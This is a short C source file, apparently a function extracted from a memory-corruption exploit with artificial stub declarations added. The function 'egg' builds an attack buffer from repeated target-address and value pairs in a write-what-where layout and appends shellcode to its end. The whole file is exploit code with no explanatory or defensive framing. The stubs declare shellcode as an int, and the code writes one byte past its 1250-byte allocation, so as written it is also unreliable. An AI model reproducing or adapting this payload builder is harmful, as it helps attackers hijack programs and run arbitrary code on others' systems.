
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ malloc (int) ;
 int shellcode ;
 int strcpy (char*,int ) ;
 int strlen (int ) ;

char *egg(unsigned int what, unsigned int where)
{
        char *ptr, *buf;
        int i=0;
        int size = strlen(shellcode);





        buf = (char *)malloc(1250);
        ptr = buf;

        for (;i<1248;) {

        *( (int **)ptr ) = (int *)( where - 8 );
        ptr+=4;
        *( (int **)ptr ) = (int *)( what );
        ptr+=4;

        i+=8;
        }
        buf[1250] = '\0';
        ptr -= size;
 strcpy(ptr, shellcode);
        ptr = buf;
        return ptr;

}
